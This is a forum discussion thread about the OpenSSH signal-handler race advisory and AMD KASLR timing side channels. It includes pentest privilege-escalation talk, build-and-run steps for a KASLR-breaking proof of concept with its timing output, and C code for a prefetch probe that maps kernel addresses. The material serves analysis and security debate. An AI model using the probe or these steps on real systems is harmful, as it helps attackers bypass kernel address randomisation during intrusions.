> In our experiments, it takes ~10,000 tries on average to win this race condition, so ~3-4 hours with 100 connections (MaxStartups) accepted per 120 seconds (LoginGraceTime). Ultimately, it takes ~6-8 hours on average to obtain a remote root shell, because we can only guess the glibc's address correctly half of the time (because of ASLR).
In theory, this could be used (much quicker than the days/weeks mentioned) to get local privilege escalation to root, if you already have some kind of shell on the system. I would assume that fail2ban doesn't block localhost.
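For scale, here is a back-of-envelope version of the quoted numbers (a sketch only; the ~10,000-try and 50% ASLR-guess figures come from the advisory above, the rest is plain arithmetic):

```c
/* Back-of-envelope check of the advisory's numbers: ~10,000 race
 * attempts at 100 connections (MaxStartups) per 120 s (LoginGraceTime),
 * with a ~50% chance of guessing glibc's base address under ASLR. */
#include <stdio.h>

int main(void) {
    double tries = 10000.0;           /* average attempts to win the race */
    double conns_per_window = 100.0;  /* MaxStartups */
    double window_s = 120.0;          /* LoginGraceTime, in seconds */
    double aslr_success = 0.5;        /* odds of guessing glibc's base */

    double race_hours = tries / conns_per_window * window_s / 3600.0;
    double shell_hours = race_hours / aslr_success;

    printf("time to win the race: ~%.1f h\n", race_hours);  /* ~3.3 h */
    printf("time to a root shell: ~%.1f h\n", shell_hours); /* ~6.7 h */
    return 0;
}
```

Which lines up with the advisory's ~3-4 hours and ~6-8 hours.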
> People are generally not trying to get root via an SSH RCE over localhost. That's going to be a pretty small sample of people that it applies to.
It's going to apply to however many servers an attacker has low-privileged access to (think: www-data) that also run an unpatched sshd. Attackers don't care whether it's an RCE or not: if a public sshd exploit can be used on a system whose Linux version has no public LPE, it will be used. Being local also greatly increases the exploitability.
Then consider the networks where port 22 is blocked from the internet but sshd is running on some internal network (or just locally for some reason).
Think “illegitimate” access to www-data. It’s very common on Linux pentests to need to privesc from some lower-privileged foothold (like a command injection in an httpd CGI script). Most Linux servers run OpenSSH. So yes, I would expect this to turn out to be a useful privesc in practice.
I don’t get it then… Do you never end up having to privesc in your pentests on Linux systems? No doubt it depends on the customer profile, but personally I would guess that on at least 25% of engagements in Linux environments I have had to find a local path to root.
> Do you never end up having to privesc in your pentests on linux systems?
Of course I do.
I'm not saying privesc isn't useful, I'm saying the cases where you will ssh to localhost to get root are very rare.
Maybe you test different environments or something, but on most corporate networks I test, the Linux machines are dev machines just used for compiling/testing that basically have shared passwords, or they're servers for webapps or something else where normal users, most of whom have a Windows machine, won't have a shell account.
If there's a server where I only have a local account and I'm trying to get root and it's running an ssh server vulnerable to this attack, of course I'd try it. I just don't expect to be in that situation any time soon, if ever.
> on most corporate networks I test, the Linux machines are dev machines just used for compiling/testing that basically have shared passwords, or they're servers for webapps or something else where normal users, most of whom have a Windows machine, won't have a shell account.
And you don't actually pentest the software which those users on the Windows machines are using on the Linux systems? So you find a Jenkins server which can be used to execute Groovy scripts to run arbitrary commands, the firewall doesn't allow connections through port 22, and it's just a "well, I got access, nothing more to see!"?
> And you don't actually pentest the software which those users on the Windows machines are using on the Linux systems?
You really love your assumptions, huh?
> it's just a "well, I got access, nothing more to see!"?
I said nothing like that. And besides, if you were not just focused on arguing for the sake of it, you would see MY point was about the infrequency of the situation you were talking about (and even then, your original point seemed contrarian in nature more than anything).
Instead of taking the time to reply 'huh' multiple times, you should make sure you read what you're replying to.
For example:
> Huh? Exploiting an unpatched vulnerability on a server to get access to a user account is.. very rare?
The 'this' I refer to is very clearly not what you've decided to map it to here. The 'this' I refer to, if you follow the comment chain, refers to a subset of something you said which was relevant to your point - the rest was not.
You could have also said "99% of people don't let their login time out and hit the SIGALRM"... People don't usually use an SSH RCE because there usually isn't an SSH RCE. If there is, why wouldn't they?
It doesn't matter if 99% of the situations you can think of are not problematic. If 1% is feasible and the attackers know about it, it's an attack vector.
> Side note: we discovered that Ubuntu 24.04 does not re-randomize the ASLR of its sshd children (it is randomized only once, at boot time); we tracked this down to the patch below, which turns off sshd's rexec_flag. This is generally a bad idea, but in the particular case of this signal handler race condition, it prevents sshd from being exploitable: the syslog() inside the SIGALRM handler does not call any of the malloc functions, because it is never the very first call to syslog().
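To make the rexec point concrete, here is a minimal sketch (my own illustration, not the advisory's code) of why fork()-only children share their parent's ASLR layout while re-exec'ed children get a fresh one. Build it as a PIE (the default on modern distros) and run it: the forked child prints the same address as the parent, the re-exec'ed child prints a different one.

```c
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>

int main(int argc, char **argv) {
    printf("pid %d: main at %p\n", getpid(), (void *)main);

    if (argc > 1)                 /* we are the re-exec'ed child */
        return 0;

    if (fork() == 0) {            /* fork only: layout is inherited */
        printf("pid %d (fork):  main at %p  <- same as parent\n",
               getpid(), (void *)main);
        _exit(0);
    }
    wait(NULL);

    if (fork() == 0) {            /* fork + exec: layout is re-randomized */
        execl("/proc/self/exe", argv[0], "rexec", (char *)NULL);
        _exit(1);
    }
    wait(NULL);
    return 0;
}
```

sshd with rexec_flag on does the fork+exec dance for every connection; the Ubuntu patch described in the quote switches it to the fork-only case, so every connection handler shares the layout chosen once at boot.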
> Ultimately, it takes ~6-8 hours on average to obtain a remote root shell, because we can only guess the glibc's address correctly half of the time (because of ASLR).
AMD to the rescue: fortunately, they decided to leave the Take A Way and prefetch-type-3 vulnerabilities unpatched, and continue to recommend that the KPTI mitigation be disabled by default due to its performance cost. This breaks ASLR on all these systems, so they can be exploited in a much shorter time ;)
AMD’s handling of these issues is WONTFIX, despite the latter (contrary to their assertion) even providing actual kernel data leakage, at a higher rate than Meltdown itself…
edit: there is now a third one, building on the first, with unpatched vulnerabilities in all Zen 1/Zen 2 parts as well… so it seems this one is WONTFIX too, like most of the defects TU Graz has turned up.
Seriously, I don’t know why the community tolerates these defenses being known-broken on the most popular CPU brand in the enthusiast market, while allowing the vendor to knowingly disable the defense that’s already implemented and would prevent this leakage. Is defense-in-depth not a thing anymore?
Nobody in the world would ever tell you to explicitly turn off ASLR on an Intel system that is exposed to untrusted attackers… yet that’s exactly the configuration AMD continues to recommend, and everyone goes along without a peep. It’s literally a kernel option that is already implemented and tested and that hardens you against ASLR leakage.
The “it’s only metadata” line is so tired. Metadata is more important than regular data in many cases: we kill people, convict people, and control all our security and access control via metadata. Like, yeah, it’s just your ASLR layout leaking, what’s the worst that could happen? And real data leaks in several of these exploits too, but that’s not a big deal either… not like those SSH keys are important, right?
What are you talking about?
My early-2022 Ryzen 5625U shows:
```
Vulnerabilities:
  Gather data sampling:   Not affected
  Itlb multihit:          Not affected
  L1tf:                   Not affected
  Mds:                    Not affected
  Meltdown:               Not affected
  Mmio stale data:        Not affected
  Reg file data sampling: Not affected
  Retbleed:               Not affected
  Spec rstack overflow:   Vulnerable: Safe RET, no microcode
  Spec store bypass:      Mitigation; Speculative Store Bypass disabled via prctl
  Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
  Spectre v2:             Mitigation; Retpolines; IBPB conditional; IBRS_FW; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected
  Srbds:                  Not affected
  Tsx async abort:        Not affected
```
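That list is the kernel's self-reported view, exported under /sys/devices/system/cpu/vulnerabilities (which is what `lscpu` reads). A tiny sketch to dump it directly, assuming a reasonably recent Linux kernel:

```c
/* Print every entry under /sys/devices/system/cpu/vulnerabilities,
 * i.e. the same status lines as in the list above. */
#include <stdio.h>
#include <dirent.h>

int main(void) {
    const char *dir = "/sys/devices/system/cpu/vulnerabilities";
    DIR *d = opendir(dir);
    if (!d) { perror(dir); return 1; }

    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (e->d_name[0] == '.')
            continue;                       /* skip "." and ".." */
        char path[4096], line[512];
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        FILE *f = fopen(path, "r");
        if (f) {
            if (fgets(line, sizeof line, f))
                printf("%-24s %s", e->d_name, line);  /* line keeps its '\n' */
            fclose(f);
        }
    }
    closedir(d);
    return 0;
}
```

Note these files only cover issues the kernel explicitly models; a clean list says nothing about problems the kernel does not check for, which is exactly the point of the reply below.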
> The issue here is that KPTI won't be enabled by default on Linux on AMD CPUs. Yet it provides valuable separation between kernel and userspace address ranges.
AMD's security bulletin is actually incredibly weaselly: it quietly acknowledges KPTI as the reason further mitigation is not necessary, and then goes on to recommend that KPTI remain disabled anyway.
> The attacks discussed in the paper do not directly leak data across address space boundaries. As a result, AMD is not recommending any mitigations at this time.
That's literally the entire bulletin, other than naming the author and recommending you follow security best practices. Two sentences, one of which is "no mitigations required at this time", for an exploit described by its author (who is also a named author of the Meltdown paper!) as "worse than Meltdown", on the most popular brand of server processor.
Like, it's all very carefully worded to avoid acknowledging the CVE in any way, while also avoiding saying anything that's technically false. If you do not enable KPTI, there is no address-space boundary, and leakage from the kernel can occur. Specifically, that leakage is page-table layouts, which AMD considers "only metadata" and therefore not important (not real data!).
But it is a building block which amplifies all these other attacks, including Spectre itself. Spectre was tested in the paper itself and, contrary to AMD's statement (one of the actual falsehoods they make despite their weaseling), does result in leakage of actual kernel data and not just metadata (the author notes that this is a more severe leak than Meltdown itself). And leaking metadata is bad enough by itself: like many kinds of metadata, the page-table layouts are probably more interesting, per byte exfiltrated, than the data itself!
AMD's interest is in shoving it under the rug as quietly as possible, because the fix costs performance: you isolate the address spaces and flush on every transition into and out of the kernel, just like with Meltdown. That's what KPTI is and does: separate page tables for kernel and user space, with the associated flushes on every switch. And AMD has leaned much more heavily on large last-level caches than Intel has, so this hurts correspondingly more.
But I don't know why the kernel team is playing along with this. The sibling commenter is right in the sense that this is not being surfaced to users to let them know they are vulnerable, and that the kernel team continues to follow AMD's recommendation of insecure-by-default, letting the issue go quietly under the rug at the expense of users' security. This undercuts something the kernel team has put significant engineering effort into mitigating - but I guess that's not as important as AMD winning benchmarks with an insecure configuration.
There has always been a weird, sickly affection for AMD in the enthusiast community, and you can see it every time there's an AMD vulnerability. When the AMD vulns really started to flow a couple of years ago, there was basically a collective shrug, and we decided to ignore them instead of mitigating. So much for "these vulnerabilities only exist because [the vendor] decided to cut corners in the name of performance!" - that is explicitly the decision AMD has made with their customers' security, and everyone's fine with it. This is a billion-dollar company cutting corners on its customers' security so it can win benchmarks. It's bad. It shouldn't need to be said, but it does.
I very much feel that, even granting that people's interest in and concern about these exploits fades over time, Intel certainly would not have received the same level of deference, even today (let alone a couple of years ago), if they had just said that a huge, performance-sapping patch was "not really necessary" and that everyone should run their systems in an insecure configuration so that benchmarks weren't unduly harmed. It's a weird thing people have where they need to cover all the bases before they will acknowledge the slightest fault or misbehavior by this specific corporation. Same as the sibling who disputed all this because Linux said he was secure: yeah, the kernel team doesn't seem to care about that, but as I demonstrated, there is still a visible timing difference even on current BIOS/OS combinations.
Same damn thing with Ryzenfall too: despite the skulduggery around Monarch, CTS Labs actually did find a very serious vuln (actually 3-4 very serious exploits that let them break out of a guest, jailbreak the PSP, bypass AMD's UEFI signing, and achieve persistence), and it's funny to look back at the people whining that it doesn't deserve a 9.0 severity or whatever. Shockingly, MITRE doesn't give those out for no reason, and AMD doesn't patch "root access lets you do root things" for no reason either.
I get why AMD is doing it. I don't get why the kernel team plays along. It's unintentionally a really good question from the sibling: why isn't the kernel team applying its standards uniformly? Here's A Modest Security Proposal: if we just don't care about this class of exploit anymore, and KASLR isn't going to be a meaningful part of defense-in-depth, shouldn't it be disabled for everyone at this point? Is that a good idea?
But is this not the same thing on Intel CPUs? I believe "new" Intel CPUs are also unaffected by Meltdown, and so KPTI will be disabled there by default.
If there are no errata leading to (FG)KASLR violations, then there is no problem disabling KPTI as a general security boundary. The thing I am saying is that vendors do not agree that processors must provide ASLR timing-attack protection as a defined security boundary in all situations.
You need to either implement processor-level ASLR protections (and those guarantees probably fade over time!) or do KPTI and flush your shit when you move between address spaces. Or there needs to be an understanding from the kernel team that they have to develop under a page-allocation model where attackers can see your allocation patterns after an initial breach. Say they breach your PRNG key: should there be additional compartmentalization after that? Multiple keys at multiple security boundaries, and within the stack more generally, to increase penetration time across security boundaries?
Seemingly the expectation is one or the other, though, because ASLR is being treated as a security boundary.
I also very much feel that at this point KPTI is just generalized, good defense-in-depth. If that's the defense that's going to be deployed after your stuff falls through anyway... let's just flush preemptively, right? That's not the current practice, but should it be?
You probably want to do `export WITH_TLB_EVICT=1` before you `make`, then run `./kaslr`. The power stuff is patched (by removing the RAPL power interface), but there are still timing differences visible on my 5700G, and WITH_TLB_EVICT makes them fairly obvious/consistent.
Those timing differences are the presence/non-presence of kernel pages in the TLB; those are the KASLR pages, and they're slower when the TLB eviction happens because of the extra bookkeeping.
Then we have the stack protector canary on the last couple of pages, of course:
```csv
512,0xffffffffbf800000,91,82,155
513,0xffffffffbfa00000,92,82,147
514,0xffffffffbfc00000,92,82,151
515,0xffffffffbfe00000,91,82,137
516,0xffffffffc0000000,112,94,598
517,0xffffffffc0200000,110,94,544
518,0xffffffffc0400000,110,94,260
519,0xffffffffc0600000,110,94,638
```
edit: the 4 pages at the end of the memory space are very consistent between tests and across reboots, and the higher lookup time goes away if you set the kernel boot option "pti=on" manually at startup; the default, with KPTI left off, is the insecure behavior described in the paper.
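For anyone curious what the measurement boils down to: a minimal sketch of the kind of prefetch-timing probe such PoCs are built around (my own reconstruction, not the actual `./kaslr` tool; it assumes x86-64 Linux and that prefetches of kernel addresses complete without faulting, in measurably different time depending on translation/TLB state):

```c
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>
#include <x86intrin.h>

/* Time a single prefetch of a (possibly unmapped) kernel address.
 * PREFETCH never faults, so probing kernel addresses is safe. */
static uint64_t probe(const char *addr) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_prefetch(addr, _MM_HINT_NTA);
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    /* Scan the same region as the csv above, in 2 MiB steps; mapped
     * kernel pages show up as timing outliers. */
    for (uint64_t a = 0xffffffffbf800000ull; a <= 0xffffffffc0600000ull;
         a += 0x200000ull) {
        uint64_t best = UINT64_MAX;
        for (int i = 0; i < 1024; i++) {   /* keep the minimum over retries */
            uint64_t t = probe((const char *)a);
            if (t < best) best = t;
        }
        printf("%#018" PRIx64 ",%" PRIu64 "\n", a, best);
    }
    return 0;
}
```

The real tooling additionally performs TLB eviction between probes (that's what WITH_TLB_EVICT toggles) and averages over many runs; this only shows the raw probe loop.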
Mitigate by using fail2ban?
Nice to see that Ubuntu isn't affected at all